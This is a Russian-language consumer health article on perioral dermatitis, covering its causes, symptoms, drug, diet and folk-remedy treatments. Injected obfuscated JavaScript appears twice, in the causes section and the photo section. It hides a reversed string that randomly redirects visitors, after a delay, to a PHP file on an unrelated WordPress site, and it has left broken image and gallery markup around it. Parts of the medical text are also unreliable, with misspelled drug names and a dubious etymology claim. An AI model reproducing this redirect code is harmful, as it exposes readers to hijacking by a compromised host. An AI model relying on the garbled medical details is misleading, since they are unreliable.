Пероральный дерматит: фото, причины и симптомы, лечение

Пероральный дерматит (розацеа периоральная, околоротовый дерматит, стероидный дерматит лица) – это хроническое дерматологическое заболевание, встречающееся, в основном, у девушек и женщин в возрасте 19–45 лет и очень редко у детей и мужчин. Данное заболевание характеризуется появлением специфических высыпаний на коже вокруг рта и создает своему носителю массу физических, эстетических и психологических проблем.

Причины перорального дерматита

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/05/peroralnyy-dermatit.gif» alt=»Пероральный дерматит фото» width=»268″ height=»204″ /> Пероральный дерматит

Причины, вызывающие пероральный дерматит, на сегодняшний день не установлены. Между тем, доказано, что основным фактором, способствующим появлению этого заболевания, является повышенная сенсибилизация кожи лица к определенным медицинским препаратам (в частности, гормональным, кортикостероидным мазям), к моющим и косметическим средствам. В отдельных случаях сыпь может быть вызвана или увеличена одним или несколькими из перечисленных ниже факторов:

  • воздействие ультрафиолетового излучения;
  • нарушение функции ЖКТ;
  • наличие в организме очагов хронической инфекции;
  • дисфункция нервной системы;
  • нарушения в работе эндокринной системы;
  • изменение гормонального статуса;
  • смена климатических условий;
  • ослабление иммунных сил организма.

Произношение и написание как «периориальный» неверно, правильно: «перориальный» (от лат. per oral — через рот)

Симптомы заболевания кожи лица

Пероральный дерматит начинается с едва заметного покраснения кожи на лице, которое усиливается при приеме горячей или острой пищи. Со временем покраснение приобретает стойкий характер и дополняется появлением на лице мелких узелков и гнойничков, отдаленно напоминающих акне (угри). Величина высыпаний варьируется от 0,5 до 3 мм в диаметре, а их окраска меняется в зависимости от стадии созревания: от синевато-красной или красно-коричневой на ранних этапах, до светло-коричневой в стадии регресса.

Высыпания на лице располагаются, как правило, симметрично, иногда они группируются, но никогда не сливаются. Излюбленные места локализации сыпи — на подбородке, в носогубных складках, на прилегающих к ним зонах щек, на коже нижней и верхней губы. Чаще всего, участок кожи, который находится непосредственно вокруг губ, не поражается пероральным дерматитом, либо поражается им в значительно меньшей степени, чем отдаленные ото рта участки. В некоторых случаях болезнь поражает кожу на переносице и вокруг глаз, причем особенно часто — в височной зоне. Достаточно часто встречаются и больные с диффузным поражением всего лица.

При неграмотном, несвоевременном лечении или при отсутствии такового, кожа на пораженном участке грубеет, утолщается, на ней появляются бугристые образования. С течением времени на месте высыпаний и бугров образуются хорошо различимые пигментные пятна.

В большинстве случаев недуг протекает безболезненно, однако некоторые пациенты могут жаловаться на жжение или легкий зуд в области высыпаний в период обострения данного заболевания. Пероральный дерматит не представляет никакой опасности для здоровья и жизни человека, но способен доставить больным массу неприятностей из-за создаваемого им косметического дефекта. Резистентность данного недуга к лечению часто вызывает у больных подавленное настроение и раздражительность.

Проявления болезни: фото

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»23217,23216,23215,23214″]

Традиционное лечение

Лечение перорального дерматита начинается с устранения причинных факторов его возникновения. В частности, медики рекомендуют больному отказаться от использования местных стероидных препаратов, фторсодержащей зубной пасты, всех, без исключения, моющих и косметических средств. Одновременно с этим, проводится медикаментозная терапия с использованием препаратов группы имизадола: трихорола и метронизадола. При наличии у больного пустулезных розацеа ему могут быть назначены и антибиотики: метациклин, метициклин, оксалицин, эритромицин или олеандомицин.

Лицам, страдающим пероральным дерматитом, показаны щадящие диеты, ограничивающие употребление в пищу чрезмерно соленых, пряных, кислых, острых блюд, крепкого чая, кофе и алкогольных напитков. Помимо диетотерапии, активно применяется витаминотерапия, включающая назначение больному рибофлавина, никотиновой кислоты, аскорутина и витамина B6.

При локализации высыпаний вокруг глаз, больные должны находиться под постоянным контролем офтальмолога. При подобной форме пациентам назначаются гидрокортизоновые капли, преднизолон, антигистаминные средства и инъекции рибофлавин-фосфата (1%).

На заключительном этапе лечения активно применяются физиотерапевтические процедуры. В частности, больным показан криомассаж с использованием жидкого азота или снега угольной кислоты, а также электролиз, при помощи которого удаляются стойко сохраняющиеся телеангиоэктазии в пораженных пероральным дерматитом зонах.

В течение всего периода лечения больным рекомендуется как можно меньше времени проводить на солнце и в помещениях с повышенной температурой воздуха.

Лечение перорального дерматита народными средствами

Традиционное лечение перорального дерматита может быть дополнено терапией с использованием средств народной медицины. В частности, при первом проявлении симптомов данного заболевания рекомендуется:

  • снимать воспаление при помощи примочек, приготовленных на основе отвара полыни, ромашки аптечной, липового цвета или череды;
  • ежедневно протирать пораженные участки кожи отваром, приготовленным на основе цветков календулы, травы чистотела, тысячелистника или зверобоя;
  • приготовить отвар на основе листьев подорожника, цветков аптечной ромашки и календулы, травы шалфея и зверобоя, корня девясила и ежедневно принимать его внутрь по одному стакану, предварительно разделив суточную дозу на три равных приема.

Прогноз перорального дерматита, при наличии своевременного, грамотного и полноценного лечения, всегда благоприятный. Количество рецидивов после такого лечения, как правило, невелико.

Материал актуализирован 14.05.2017

Adblock
detector